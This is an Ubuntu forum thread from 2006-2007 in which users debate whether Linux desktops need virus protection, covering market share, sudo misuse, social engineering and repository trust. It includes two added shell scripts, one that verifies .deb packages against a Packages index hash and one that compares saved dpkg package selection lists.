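The per-file check that separates the two install paths discussed in this post can be shown directly. The script below is an added example, not code from the thread or from apt: it checks a downloaded .deb against the SHA256 recorded in a Debian-style Packages index, which is the check a repository install gets and a file installed from outside the repository does not. It assumes the index itself was already authenticated (apt does this through the signed Release file); the function names, package names and file contents are constructed.

```shell
#!/bin/sh
# Added example: verify a .deb against a trusted Packages index before install.
# Assumption: the index passed in has already been authenticated.

# sha256_of FILE: print the hex SHA-256 digest of FILE
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    else
        shasum -a 256 "$1" | awk '{ print $1 }'
    fi
}

# index_sha256 INDEX NAME
# Print the SHA256 field of the stanza whose Filename ends in /NAME.
# Prints nothing when the index does not list NAME.
index_sha256() {
    awk -v want="$2" '
        BEGIN { RS = ""; FS = "\n" }      # one blank-line-separated stanza per record
        {
            file = ""; sum = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^Filename: /) {
                    file = substr($i, 11)
                    sub(/^.*\//, "", file) # keep only the base name
                } else if ($i ~ /^SHA256: /) {
                    sum = substr($i, 9)
                }
            }
            if (file == want) { print sum; exit }
        }' "$1"
}

# verify_deb INDEX DEB
# Returns 0 if DEB matches the index, 1 on a hash mismatch,
# 2 if the index does not list a file of that name.
verify_deb() {
    deb_name=$(basename "$2")
    expected=$(index_sha256 "$1" "$deb_name")
    if [ -z "$expected" ]; then
        echo "UNLISTED $deb_name: not in the trusted index" >&2
        return 2
    fi
    actual=$(sha256_of "$2")
    if [ "$actual" = "$expected" ]; then
        echo "OK $deb_name"
        return 0
    fi
    echo "MISMATCH $deb_name: expected $expected, got $actual" >&2
    return 1
}

# make_repo_sample DIR
# Write a constructed stand-in package file and a two-stanza index into DIR.
make_repo_sample() {
    printf 'constructed stand-in for a package archive\n' > "$1/hello_1.0_all.deb"
    printf 'another constructed file\n' > "$1/other.tmp"
    {
        printf 'Package: other\nVersion: 2.3\nArchitecture: all\n'
        printf 'Filename: pool/main/o/other/other_2.3_all.deb\n'
        printf 'SHA256: %s\n\n' "$(sha256_of "$1/other.tmp")"
        printf 'Package: hello\nVersion: 1.0\nArchitecture: all\n'
        printf 'Filename: pool/main/h/hello/hello_1.0_all.deb\n'
        printf 'SHA256: %s\n' "$(sha256_of "$1/hello_1.0_all.deb")"
    } > "$1/Packages"
    rm -f "$1/other.tmp"
}

# Usage: sh verify_deb.sh INDEX FILE.deb
if [ "$#" -eq 2 ]; then
    verify_deb "$1" "$2"
fi
```

A file that comes back as UNLISTED or MISMATCH is exactly the kind of package the post worries about: nothing in the trusted index vouches for its contents.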
Portable_Jim
November 19th, 2006, 04:54 AM
I was just wondering how many Linux viruses there are currently and how many there are out in the wild currently.
I have seen articles but they are 1+ year(s) old. I know that (unless you are protecting a Windows computer) a linux antivirus program is about as useless as wearing a raincoat in the desert in the middle of a drought. I just want some info about whether there are any?
Architeuthis
November 19th, 2006, 06:09 AM
Interesting question actually, I found this page: http://www.viruslibrary.com/virusinfo/Linux.htm (I don't know how accurate viruslibrary.com is).
and this one: http://en.wikipedia.org/wiki/List_of_Linux_computer_viruses (last modified on 26 September 2006).
az
November 19th, 2006, 09:18 AM
Linux distributions are compatible at the source code level. They are not always binary-compatible. Even different releases of Ubuntu are not always binary-compatible with one another.
On the other hand, windows tries to be binary-compatible throughout.
So any tally of viruses for linux would have to take into account which specific versions of the distro/toolchain/application it can work with. So any number of viruses you can find is not really useful.
purplearcanist
December 21st, 2006, 01:59 PM
One thing that annoys a computer user the most is finding a virus on their computer. Most often, the targets of these attacks are Windows computers. That is because 80% of the computers in the world have Windows as their operating system.
My question to you is this.
If you have a non-windows operating system on your computer (such as Mac, Ubuntu, Debian, etc.), do you have enough virus protection on your computer?
Xzallion
December 21st, 2006, 02:02 PM
Long as you use common sense you should be fine. If you're connected to a network and can spare it, a small antivirus app would help curb the possibility of your computer helping to spread network viruses.
maxamillion
December 21st, 2006, 02:08 PM
Yes and No.
The issue isn't so much that you are ultimately protected but the fact is that in the event an exploit is found that could result in a virus being written, they are acknowledged and fixed in a timely manner in the cases of OS X, GNU/Linux, BSD, etc.
Also, there isn't a lot of pride or point in writing a virus for the operating systems that aren't agitating the people. Microsoft becomes target to viruses due to a hacker's desire of pride in bringing them down and their popularity plays a factor as well. Why would a hacker who is writing a virus for a machine choose to write one for the operating system he is probably running and that only accounts for roughly 5% of the home computing market (if that)? ... yeah, I don't have an answer for that one either.
There was one proof of concept virus that was released by some security company, Linus fixed the linux kernel the next day (iirc).
Hope this helped, I will warn that some of it's opinionated so it won't result in a perfect answer, but that's generally my thoughts and understanding of it.
TheWizzard
December 21st, 2006, 02:08 PM
If you have a non-windows operating system on your computer (such as Mac, Ubuntu, Debian, etc.), do you have enough virus protection on your computer?
depends on the definition of enough.
i voted no because stupid ubuntu users with sudo permissions can install malicious software easily.
jdhore
December 21st, 2006, 02:46 PM
yeah, this is a difficult one...it is true that Linux and Unix-based systems rarely if ever get viruses...and this reason is probably due to a few facts:
1. a lot less people use Linux compared to Windows, so you can't gain nearly as many systems as a virus-writer would with a Windows virus.
2. Linux users are generally MUCH smarter than Windows users so we know not to click on attachments we don't trust, etc.
3. If a virus did come out for Linux, it's open source so the "vulnerability" would be fixed pretty quickly.
that having been said, i'm SURE Linux viruses exist partly because if no viruses existed, why would there be virus scanners for Linux systems...
Also, very few people are running Linux as root so if a virus does get in, it can't really do much damage.
shining
December 21st, 2006, 02:55 PM
Are you referring to ClamAV? (that's the only one I know)
Because it's mostly used for scanning windows viruses. It's useful for mail servers:
http://www.clamav.net/whos.html#pagestart
Also, very few people are running Linux as root so if a virus does get in, it can't really do much damage.
It can still delete all your data. I care much more about my data than my system, because the system can easily be reinstalled, but the data is lost for ever.
You generally just back up your own data, not the whole system, don't you?
prizrak
December 21st, 2006, 02:56 PM
1) There are crossplatform worms that attack applications rather than the OS. i.e. Apache Slammer
2) DOS has viruses ;)
3) OS X has been hit with viruses before if not on the same scale as Windows.
Having a different OS doesn't protect you from viruses, having a well designed OS with an ability to whitelist rather than blacklist software does. This is why there are so many successful viruses for Windows despite the four hundred billion A/V products out there. If a virus is unknown the A/V won't stop it. The only good protection from a virus is making sure that only the applications you know to be safe are executed. If all I do is use Firefox, Gaim and OpenOffice, and set SELinux to only allow those to run there is virtually no way a virus would make it into my machine.
prizrak
December 21st, 2006, 02:58 PM
Yes and No.
The issue isn't so much that you are ultimately protected but the fact is that in the event an exploit is found that could result in a virus being written, they are acknowledged and fixed in a timely manner in the cases of OS X, GNU/Linux, BSD, etc.
Also, there isn't a lot of pride or point in writing a virus for the operating systems that aren't agitating the people. Microsoft becomes target to viruses due to a hacker's desire of pride in bringing them down and their popularity plays a factor as well. Why would a hacker who is writing a virus for a machine choose to write one for the operating system he is probably running and that only accounts for roughly 5% of the home computing market (if that)? ... yeah, I don't have an answer for that one either.
There was one proof of concept virus that was released by some security company, Linus fixed the linux kernel the next day (iirc).
Hope this helped, I will warn that some of it's opinionated so it won't result in a perfect answer, but that's generally my thoughts and understanding of it.
OS X had a hole in its kernel the size of Texas for about 5 years (it actually came from the BSD flavor they based it on) before it got fixed. Yeah they are a picture of quick response :rolleyes:
ssam
December 21st, 2006, 04:10 PM
does anti virus software really keep you safe? there are viruses these days that spread to many computers within hours. no antivirus company can keep up with that.
IYY
December 21st, 2006, 04:17 PM
What does `enough' mean? Not a single Linux-using friend of mine has ever gotten a virus or any other type of malware. I think that's enough.
RudolfMDLT
December 21st, 2006, 04:18 PM
Just as a matter of statistics;
most of the forum users who have come from a Windose background must have had something to do with a virus. How many Ubuntu/Linux users in general, have had any viral threat/contact at all? (and I'm not talking about mail servers.)
patrick295767
December 21st, 2006, 04:22 PM
depends on the definition of enough.
i voted no because stupid ubuntu users with sudo permissions can install malicious software easily.
We have to be very vigilant! Source and code should be checked twice when the origin is not sure
patrick295767
December 21st, 2006, 04:27 PM
does anti virus software really keep you safe? there are viruses these days that spread to many computers within hours. no antivirus company can keep up with that.
I noticed that in windows, after one or two years, anti virus scanners are able to see a virus in one file ...
Imagine that during one or two years, the viruses are there, mutated from another one, mutant virus that not many programs can detect ... or it takes some time ...
that's called WINDOWS world !
hoagie
December 21st, 2006, 04:28 PM
Well it depends. Sure a Linux distribution is far safer than windows, same goes for the Macintosh platform.
Although if the user is stupid enough he is always going to be able to install malicious software on his computer no matter what operating system he's using.
So don't give your sudo password to dumb users!
jdhore
December 21st, 2006, 05:29 PM
Are you referring to ClamAV? (that's the only one I know)
Because it's mostly used for scanning windows viruses. It's useful for mail servers:
http://www.clamav.net/whos.html#pagestart
It can still delete all your data. I care much more about my data than my system, because the system can easily be reinstalled, but the data is lost for ever.
You generally just back up your own data, not the whole system, don't you?
i've seen other Linux AV apps...i know AVG has a free version of one...i think there's also one by F-Prot and there are even a few in the apt repos, but i'm too lazy to go look.
and yes, it can destroy your data, but this is why doing incremental backups is good...also, i'd rather not reinstall the whole OS cuz i can rarely remember all the apps i had installed so i usually can't remember to put everything back like it was
patrick295767
December 21st, 2006, 05:43 PM
i've seen other Linux AV apps...i know AVG has a free version of one...i think there's also one by F-Prot and there are even a few in the apt repos, but i'm too lazy to go look.
and yes, it can destroy your data, but this is why doing incremental backups is good...also, i'd rather not reinstall the whole OS cuz i can rarely remember all the apps i had installed so i usually can't remember to put everything back like it was
clamav should be in the repos
TheWizzard
December 21st, 2006, 05:53 PM
2. Linux users are generally MUCH smarter than Windows users so we know not to click on attachments we don't trust, etc.
pretty arrogant and wishful thinking, i'm afraid. the ubuntu forum is scattered with people who try before they read. and social engineering is the most serious computer security threat.
What does `enough' mean? Not a single Linux-using friend of mine has ever gotten a virus or any other type of malware. I think that's enough.
this was exactly my attitude in the early DOS-age. only proof of concept viruses existed until a real virus destroyed much of my data.
for normal users data is more important than the system. linux - in general - is very good at protecting the system, but data can always be destroyed. so backup your data and be aware of rootkits.
TheWizzard
December 21st, 2006, 05:57 PM
and yes, it can destroy your data, but this is why doing incremental backups is good...also, i'd rather not reinstall the whole OS cuz i can rarely remember all the apps i had installed so i usually can't remember to put everything back like it was
to backup your list of apps:
$ dpkg --get-selections | grep -v deinstall > installed-software.log
restore system:
# dpkg --set-selections < /backup/installed-software.log
see:
http://www.cyberciti.biz/tips/linux-get-list-installed-software-reinstallation-restore.html
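The two commands in this post save and reload the package selections; `dpkg --set-selections` only records the wanted states, and a follow-up such as `apt-get dselect-upgrade` is what actually installs them. The script below is an added example, not part of the post: it compares a saved list with the current one, showing what a reinstall still lacks and what was never in the saved list. The function names and the package lists are constructed for illustration.

```shell
#!/bin/sh
# Added example: compare a saved `dpkg --get-selections` list with the current one.

# wanted_packages FILE
# Print, sorted, the packages whose recorded state is "install" or "hold".
# Matching on the state column avoids a side effect of `grep -v deinstall`,
# which also drops any package whose *name* contains "deinstall".
wanted_packages() {
    awk '$2 == "install" || $2 == "hold" { print $1 }' "$1" | LC_ALL=C sort -u
}

# selection_drift SAVED CURRENT
#   "- pkg": wanted in SAVED but not in CURRENT (still to be reinstalled)
#   "+ pkg": wanted in CURRENT but not in SAVED (was not part of the saved list)
selection_drift() {
    drift_tmp=$(mktemp -d) || return 1
    wanted_packages "$1" > "$drift_tmp/saved"
    wanted_packages "$2" > "$drift_tmp/current"
    LC_ALL=C comm -23 "$drift_tmp/saved" "$drift_tmp/current" | sed 's/^/- /'
    LC_ALL=C comm -13 "$drift_tmp/saved" "$drift_tmp/current" | sed 's/^/+ /'
    rm -rf "$drift_tmp"
}

# make_sample_lists DIR
# Write two constructed selection lists in the name<TAB>state layout dpkg prints.
make_sample_lists() {
    printf '%s\t\t\t\t%s\n' \
        bash install clamav install gaim install \
        oldlib deinstall openoffice.org hold > "$1/saved.log"
    printf '%s\t\t\t\t%s\n' \
        bash install gaim install netcat install > "$1/current.log"
}

# Usage:
#   sh drift.sh demo             run on the constructed lists
#   sh drift.sh SAVED CURRENT    compare two real lists, e.g.
#       dpkg --get-selections > current.log
#       sh drift.sh /backup/installed-software.log current.log
if [ "${1:-}" = "demo" ]; then
    demo_dir=$(mktemp -d) && make_sample_lists "$demo_dir"
    selection_drift "$demo_dir/saved.log" "$demo_dir/current.log"
    rm -rf "$demo_dir"
elif [ "$#" -eq 2 ]; then
    selection_drift "$1" "$2"
fi
```

Lines starting with `+` deserve a look after a restore: they are packages on the machine that the saved list never asked for.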
BarfBag
December 21st, 2006, 06:01 PM
Using a different OS certainly helps, but it's not a 100% solution. I voted "Yes" anyway, though. At the moment, viruses aren't an issue. Rootkits are hard enough to pick up.
Keep in mind that even though Linux isn't #1 in personal computers, it's been #1 in servers for some time now. If Linux is as vulnerable as some people say it is, there'd at least be a good chance of picking up a virus. But there isn't. I haven't heard of a single Linux user who's picked up one. Not saying that there hasn't been one, I'm just saying that it's extremely rare.
AgenT
December 21st, 2006, 06:14 PM
One thing that annoys a computer user the most is finding a virus on their computer. Most often, the targets of these attacks are Windows computers. That is because 80% of the computers in the world have Windows as their operating system.
My question to you is this.
If you have a non-windows operating system on your computer (such as Mac, Ubuntu, Debian, etc.), do you have enough virus protection on your computer?
You are making a lot of assumptions. Your biggest assumption is that Windows gets the most viruses "because 80% of the computers in the world have Windows as their operating system". This is wrong. There are two (among many, of course) general reasons why Windows computers get viruses. 1) Windows is a joke when it comes to security. The word security and Windows are like oil and water. 2) The userbase of Windows is poorly educated. However, poor education does not invalidate #1 or make it less noteworthy, nor does it make #1 "OK".
Let me put it to you this way, Apache (open source, usually runs on GNU/Linux or BSD) has a much, much bigger market share than IIS (Microsoft) in the server market. By your assumption that should mean that Apache should have many more security problems than IIS. Guess what? It does not. In fact, IIS wins this comparison when it comes to having major server problems and vulnerabilities even with a much smaller market share than Apache.
And that brings the last point: GNU/Linux has the majority of market share on the server - no other operating system comes close. Therefore GNU/Linux should also have a ton of viruses. It does not. In fact, has anyone even heard of one wide-spread real GNU/Linux virus?
Before someone jumps on the information above by claiming that GNU/Linux does not have a very large market share lead over Windows: there are a lot of sources with bad information, either because they are incompetent, because they are paid by Microsoft (seriously, you would be surprised how many there are) or both. Those "experts" that actually show Redhat and Debian as being separate from GNU/Linux need not apply. Also notice that most of the "unknown" servers run either GNU/Linux or BSD (with GNU/Linux being the majority). For more statistics, check out netcraft. And remember: there is no such thing as 100% accurate statistics when it comes to server market research.
tebibyte
December 21st, 2006, 06:24 PM
If Linux ever becomes as popular as windows, then we would be in trouble.
Being open source does have its advantages and disadvantages. Crackers can easily search through the code. Luckily there is an enormous open source community to try and beat them to it. Can the Open source community patch holes fast enough if there was a "15 minute of fame" scenario like a self propagating Internet Worm? Look at what just happened to Symantec (http://research.eeye.com/html/alerts/AL20061215.html). Even If there was Anti Virus software installed, it would have to be professional grade. One of the few GPL'ed Anti Virus scanners, Clam AV, isn't very good when compared to its proprietary counter parts. I don't think it can even catch polymorphic worms (worms where each of its offspring is encrypted differently).
Any way It looks like being unpopular has its advantages.
(ok I'll shut up now)
TheWizzard
December 21st, 2006, 07:20 PM
You are making a lot of assumptions. Your biggest assumption is that Windows gets the most viruses "because 80% of the computers in the world have Windows as their operating system". This is wrong. There are two (among many, of course) general reasons why Windows computers get viruses. 1) Windows is a joke when it comes to security. The word security and Windows are like oil and water. 2) The userbase of Windows is poorly educated. However, poor education does not invalidate #1 or make it less noteworthy, nor does it make #1 "OK".
Let me put it to you this way, Apache (open source, usually runs on GNU/Linux or BSD) has a much, much bigger market share than IIS (Microsoft) in the server market. By your assumption that should mean that Apache should have many more security problems than IIS. Guess what? It does not. In fact, IIS wins this comparison when it comes to having major server problems and vulnerabilities even with a much smaller market share than Apache.
And that brings the last point: GNU/Linux has the majority of market share on the server - no other operating system comes close. Therefore GNU/Linux should also have a ton of viruses. It does not. In fact, has anyone even heard of one wide-spread real GNU/Linux virus?
Before someone jumps on the information above by claiming that GNU/Linux does not have a very large market share lead over Windows: there are a lot of sources with bad information, either because they are incompetent, because they are paid by Microsoft (seriously, you would be surprised how many there are) or both. Those "experts" that actually show Redhat and Debian as being separate from GNU/Linux need not apply. Also notice that most of the "unknown" servers run either GNU/Linux or BSD (with GNU/Linux being the majority). For more statistics, check out netcraft. And remember: there is no such thing as 100% accurate statistics when it comes to server market research.
it is true that most servers run unix-based systems, but for the rest i think your statements are misleading because:
1) servers do have strict backup programs, home desktop computers (often) don't,
2) the majority of today's malware is designed by scriptkiddies and based on social engineering,
3) this makes the security of desktop pc's different from servers, and
4) makes "because 80% of the computers in the world have Windows as their operating system" a correct statement.
and yes, linux systems have been targeted by rootkits. read
http://www.usenix.org/publications/login/1999-9/features/rootkits.html
what i want to say is that running a non-windows OS doesn't provide sufficient protection. installing software that does not come from a trusted repo means a serious security threat.
jdhore
December 21st, 2006, 07:49 PM
pretty arrogant and wishful thinking, i'm afraid. the ubuntu forum is scattered with people who try before they read. and social engineering is the most serious computer security threat.
this may be true, but my thinking on it is if you're smart enough to know of/try an alternative to Windows, you're probably smart enough to know BASIC virus prevention....
3rdalbum
December 22nd, 2006, 12:06 AM
Not just any non-Windows operating system. Linux, combined with the typical Linux-user's respect for security, is a pretty good combination that will beat a lot of viruses.
OS X has the potential to have a real virus problem - IIRC there are at least 29 published kernel vulnerabilities that have not been fixed, and there are a couple of other well-known vulnerabilities in user-space. Apple also takes longer to package security updates to its included FOSS applications than most Linux distributions; Damn Small Linux with its 3 month release cycle probably beats Apple for turnaround time on security updates.
I worry about Syllable - if it ever became popular, I think it would have a virus problem too. Like Microsoft, the developers of Syllable have created an operating system and then started to think about retro-fitting a proper security system.
macogw
December 22nd, 2006, 12:43 AM
For stupid people who are in root all the time and do stupid things....no
For people who know not to run random crap...yeah, probably
I still have ClamAV installed on my laptop though. Oddly, I'm the not-stupid-computer-user in the family. I didn't put it on my mom's computer. In this case, it works though. No one else in my family will ever do anything as root, and if they do anything sudo it's um..wait...they *might* attempt to use Synaptic a couple of times. That's the extent of it. I have it on mine to avoid passing things on to Windows-users if I get an infected jpeg or something.
The speed of fixing possible exploits is what makes FF better than IE though...that does help a lot.
argie
December 22nd, 2006, 12:55 AM
...
It can still delete all your data. I care much more about my data than my system, because the system can easily be reinstalled, but the data is lost for ever.
You generally just back up your own data, not the whole system, don't you?
On the computer I use, each member of my family has a different account. So if one gets a virus it is sandboxed to that person's home. It's not a great solution (that person could still lose all their stuff), but it's better than all of us having a problem.
kuja
December 22nd, 2006, 01:28 AM
to backup your list of apps:
$ dpkg --get-selections | grep -v deinstall > installed-software.log
restore system:
# dpkg --set-selections < /backup/installed-software.log
see:
http://www.cyberciti.biz/tips/linux-get-list-installed-software-reinstallation-restore.html
Thanks for this bit, it'll save me the time of maintaining my own script. This will make a nice cron job. ;)
this may be true, but my thinking on it is if you're smart enough to know of/try an alternative to Windows, you're probably smart enough to know BASIC virus prevention....
Not necessarily. Having used my computer a couple of my friends were seduced by Linux/KDE and found themselves on their way home later with a Kubuntu cd in hand 8) I assure you that one of these friends was clueless when it comes to security (and probably still is). What's more, he's spreading Linux to his friends and family, some of which are more clueless about computer security than he is. The theory that if you're smart enough to try linux then you probably know these sorts of things just doesn't hold anymore.
steven8
December 22nd, 2006, 02:56 AM
I think Linux-based systems are very safe. As ssam said, and as I have always said, you are only safe from known viruses, as anti-virus companies have to play catch up. They can't beat it until someone has been beaten by it!
TheWizzard
December 22nd, 2006, 04:06 PM
this may be true, but my thinking on it is if you're smart enough to know of/try an alternative to Windows, you're probably smart enough to know BASIC virus prevention....
i'm quite paranoid when it comes to computer security, but i have to admit i have been fooled by social engineering about 3 times in the past 5 years. :oops:
my only protection was that i wasn't running the OS they targeted. but a similar attack aimed at linux (or worse, cross-platform) would have been effective. makes me even more paranoid :???:
darkhatter
December 22nd, 2006, 04:56 PM
This is a huge NO!!!!
that's why Novell and Red Hat are working on projects. This is the whole reason SELinux and AppArmor exist
aysiu
December 22nd, 2006, 05:34 PM
Low market share making you a less likely target may not be the only factor determining security against viruses, but it is a big factor, and I don't see Linux desktop marketshare increasing by a significant margin overnight, so I voted "yes."
That said, I think if you get enough stupid users (and there are varying levels of stupidity, of course--not all Ubuntu users are smart when it comes to security, but I'd say on the whole, they tend to be a little bit more informed about malware than the average Windows user) and malware writers start creating double-click .deb files that are viruses, security goes out the window.
If the user will click on anything and give an admin password away to anything, then what good does security structure in the OS do?
aysiu
December 22nd, 2006, 06:30 PM
I've merged all the security discussion (leaving out security support threads) here, and I think if you read through it, you'll see that there are varying answers ranging from "there's no difference" to "there's a huge difference."
Read the arguments and draw your own conclusions based on logic, experience, and examples.
Attached is an older poll that got eaten up by the merger.
Genius16
January 16th, 2007, 08:28 PM
Greetings. Me and a good friend of mine seem to love debating the ups and downs of windows and linux. Yeah, he's tried a few times to use linux and liked it somewhat. But usually gave up after trying to install ATI video drivers. (Poor ati. When will they support all of their customers?)
Anyway, he posed a thought that I found rather interesting. If everyone used linux, there would be tons of spyware for linux as there is for windows. I do not believe it to be .... So, instead of debating it with him, I've decided to bring it to the community (true linux style) And... here is an excerpt of the chat we had.
----------------------------------------------------
(07:09:58 PM) xxxMExxx: im just debating the use of linux to the computing population that uses windows for the sole pourpose of playing bejeweled and slingo.
(07:10:09 PM) xxxMExxx: saying its superior.
(07:10:15 PM) xxxWINDOWS USERxxx: Like I said, if every PC on the face of the planet was a linux box.. there would be just as many exploits, hacks, spyware, everything else as there is for windows now
(07:10:16 PM) xxxMExxx: then you called me an elitist. or something
(07:10:18 PM) xxxWINDOWS USERxxx: That's simple logic
(07:10:27 PM) xxxMExxx: id have to disagree
(07:10:38 PM) xxxWINDOWS USERxxx: How can you?
(07:10:52 PM) xxxMExxx: i can take it to several windows and linux based forums and let the populace answer?
----------------------------------------------------
There you have it guys. Does linux have the capabilities to fend off spyware with everyone programming for it? Are the community driven programming and development teams enough to fend off an army of spyware? Will we fix bugs as soon as they crop up, as we have in the past? Or will it be Windows ME all over again?
rabid9797
January 16th, 2007, 08:34 PM
one of the key differences between linux and windows is the use of executable files for programs. spyware is basically an executable program that slipped onto your computer undetected and executed itself in the background without you knowing it and, being an executable file which can do ANYTHING it pleases, harms your computer.
linux on the other hand has no file type like an .exe that can do everything and anything on its own.
now...would that stop people from trying to get spyware and such on your computer? no, but it would sure as hell make it a lot harder :mrgreen:
23meg
January 16th, 2007, 08:38 PM
linux on the other hand has no file type like an .exe that can do everything and anything on its own.
There are executable files in all operating systems, including Linux based ones, and whether you'll get malware by running an executable on your computer is completely a matter of trust and knowing what you're doing.
Tomosaur
January 16th, 2007, 08:38 PM
Linux is more secure than windows, this is true. Windows has more vulnerabilities, it's just a matter of fact. There's also common user error. Most people run Windows as administrator (something you really never do in Linux unless installing system-wide programs / maintenance etc). Windows just does not force good security, so most security related stuff depends entirely on firewalls, patches, antiviruses etc. In linux, even if there WERE the same number of viruses available - you're probably going to have to install them yourself for them to do any damage. In some sense, your friend is right. It's pretty likely that if Linux were as popular as Windows, more people would want to target it. That's just common sense. Whether they'd be successful or not is another question entirely. There's always the idiot contingent, who will install anything and everything, and open every email and such. Those boxes won't take long to be infected. Viruses and such wouldn't have nearly the same propagation level as they do on Windows though (ie, spreading from box to box via contact lists, file transfers, whatever), because like I said earlier, the viruses for linux are more likely to rely on social engineering (similar to spam) than exploiting vulnerabilities. Once they're installed - they may well be locked inside the user dir, which means any damage is limited. If they're installed system-wide (as root) then it's quite possible that those boxes would be completely compromised. There is ALWAYS the possibility that a virus can exploit a security hole (ie, in the actual code), and do massive damage, but the nature of open source means that these holes either never appear, or are patched and closed within hours (sometimes even minutes) of discovery. Windows security updates are released on a schedule, meaning holes can be left open for months, giving viruses time to propagate.
Mateo
January 16th, 2007, 08:39 PM
Is this 2003? What computer has adware or spyware issues any more? Unless you are using windowsME, this isn't a real problem.
zerhacke
January 16th, 2007, 08:39 PM
Ah... no, rabid. There are executable programs on Linux. They may not be tailed .exe, but do you think OSX programs are tailed .exe? A file does not need to be extensioned .exe to be executable.
Tomosaur
January 16th, 2007, 08:40 PM
Is this 2003? What computer has adware or spyware issues any more? Unless you are using windowsME, this isn't a real problem.
Are you kidding?
Mateo
January 16th, 2007, 08:41 PM
nope. nice grub editor by the way.
Tomosaur
January 16th, 2007, 08:42 PM
nope. nice grub editor by the way.
Thanks :)
But you're wrong about viruses.
Mateo
January 16th, 2007, 08:44 PM
I guess if you're stupid enough to run "freeporn.exe" from a spam email, then it's possible to get spyware/viruses. But the days of having to run adaware and spybot to get rid of random popups just by browsing the web are long gone.
Tomosaur
January 16th, 2007, 08:53 PM
I guess if you're stupid enough to run "freeporn.exe" from a spam email, then it's possible to get spyware/viruses. But the days of having to run adaware and spybot to get rid of random popups just by browsing the web are long gone.
Hmm, dunno about that. I routinely have to clear up all that crap from Windows boxes. Viruses are still common - but like I said earlier, they've turned to more social engineering tactics. The number of 'exploit' viruses (ie, those which just appear on your computer) seem to have dropped radically, but viruses in themselves are still far too common. Just do a search on Limewire or something - I can almost guarantee that many of the files returned will be far too small to be the real thing, but will have the right name. Virus ahoy.
I find that almost everything bad makes its way through Internet Explorer though. There still must be enough exploitable bugs and stuff. Let's put it this way: it's still not safe to run XP without an antivirus and a firewall.
ComplexNumber
January 16th, 2007, 09:01 PM
what was the name of that guy that supposedly came back from the future(where, allegedly, most of the world used unix) to the present because he had to rectify the 2038 unix problem or something? its the sort of story one reads about in the Fortean Times. after googling, it appears that his name is john titor. click (http://johntitor.strategicbrains.com/) and click (http://www.johntitor.com/Pages/5100.html).
i suppose this is kinda off-topic, but its interesting...even if it requires taking with a very small pinch of salt.
loell
January 16th, 2007, 09:03 PM
I guess if you're stupid enough to run "freeporn.exe" from a spam email, then it's possible to get spyware/viruses. But the days of having to run adaware and spybot to get rid of random popups just by browsing the web are long gone.
really? where were you these past few months and a couple of years?
far too many will agree that they are thriving more than ever :D
raul_
January 16th, 2007, 09:22 PM
Linux isn't popular. 70% of the websites are hosted in Linux servers, including Google and Yahoo. Why bother attacking Linux? Pffft
aysiu
January 16th, 2007, 09:42 PM
If desktop Linux had the kind of marketshare Windows currently enjoys, it would also have a lot of stupid users--the kind who want to download every "cool" program and toolbar and plug-in possible without checking what else comes along with those programs, the kind who will enter their passwords for just about anything.
It would not be difficult to see how malware would be rampant. Just create a bunch of "cool" programs on download.com that came as .deb files. People would download the .deb files, double-click them, authenticate with a password, and give that "cool" program systemwide access.
SunnyRabbiera
January 16th, 2007, 09:48 PM
well it is just as easy to hack into a linux system as it is a windows one, but in my opinion even if Linux got the market away from windows I don't think many will target it...
It's policy that will make the difference, while MS tries to oppress competition Linux is open to it.
and the linux philosophy will prevent hackers as well, a high priced megabucks company is more of a target than one that would be flexible.
Genius16
January 16th, 2007, 09:50 PM
I'm really digging your responses, keep it up.
But I'm having trouble finding a good windows support forum to post this topic on. I want to be as unbiased as possible. (One I did find that had plenty of users bans gmail.com)
Any suggestions?
23meg
January 16th, 2007, 09:51 PM
It would not be difficult to see how malware would be rampant. Just create a bunch of "cool" programs on download.com that came as .deb files. People would download the .deb files, double-click them, authenticate with a password, and give that "cool" program systemwide access.
As I stated before in a similar thread, while this is theoretically true, the centralized repository model excels here over the "search for software via Google and download from download.com" model in that there would be no malware in the official repositories. Same would go for well known third party repositories, which undergo tight peer review. The typical non-technical user is almost guaranteed not to need anything from outside the official and well known third party repositories when using Linux, whereas with Windows, they'll need to search the web for third party apps for many common tasks, a lot which contain malware.
aysiu
January 16th, 2007, 09:52 PM
I've merged this with the other similar thread--this argument about market share's relation to vulnerability/exploits is quite popular.
loserboy
January 19th, 2007, 07:11 PM
one of the things I've been telling some friends is that for someone to hack into ur linux comp and actually edit/remove anything, they would have to brute force ur password is that not true?
dbott67
January 20th, 2007, 07:37 PM
Not true...
Linux (like Windows & OSX or any other OS) is not an island unto itself. Any applications that run on the OS have the potential to be hacked. There have been numerous vulnerabilities over the years in Apache, sendmail, PHP, Webmin, CPanel, various bulletin boards, VNC, and the list goes on and on. If the applications are not updated (or not securely installed), they can leave very easy methods of entry into your computer.
So, the basic premise to security is this:
1. Strong passwords
2. Keep the OS updated
3. Keep applications updated
4. Turn off all unnecessary services
5. Use a firewall
6. Run anti-virus (mostly Windows, but not unwise in Linux)
7. Run anti-spyware software / anti-rootkit software from time-to-time
In 15+ years of running Windows, I have never had a virus or been hacked. In 2 years of running Ubuntu, I've got hacked twice. Once was my fault because I failed to remove Webmin after playing with it. The other time was due to a major unpatched bug in VNC (http://www.ubuntuforums.org/showthread.php?t=327275) that allowed users to control my desktop without using a password (no damage done, fortunately, as I happened to be in front of my computer when the hack occurred).
-Dave
loserboy
January 23rd, 2007, 01:30 PM
this is sort of on topic so one more question-
I kind of assumed these were a given for any OS
2. Keep the OS updated
5. Use a firewall
but why is it that I see all over the place people not worried in the least about the other methods and never having a problem apparently running unprotected for years and I've been going almost a year on 3 comps with no trace of spyware or anything else for that matter.
I'm not trying to discredit your answer, I want your opinion, it just seems maybe you were really lucky with windows and really unlucky with linux judging by most everyone else's experience.
Tomosaur
January 23rd, 2007, 01:38 PM
You need to recognise the difference between Linux and Linux software. If the software is vulnerable, then it's vulnerable, it's as simple as that. Linux itself is very secure, and does employ security features to limit the damage an attack could do. Aside from that though, security is pretty much your own responsibility. If you don't update your software regularly, then you'll miss out on the patches and upgrades which close security holes. Given time, people work out how to exploit these vulnerabilities. It's really a trade off between developers writing robust software, and your own vigilance. One would hope that developers would be responsible and proactive regarding vulnerabilities, and in my experience, the open-source world has never let me down here. I have only ever been attacked through proprietary stuff, on Windows.
You also leave kind of 'electronic trail' through your internet adventures. If you visit a compromised website, then your IP address and some information about your system and software is visible. If the attacker knows of a vulnerability in say, Firefox, then he/she can just keep sitting there bouncing attacks off your IP until something sticks. Utilising a firewall and other similar software can help you, but really - once you make the decision to download and run something, the security is in your hands.
Johnsie
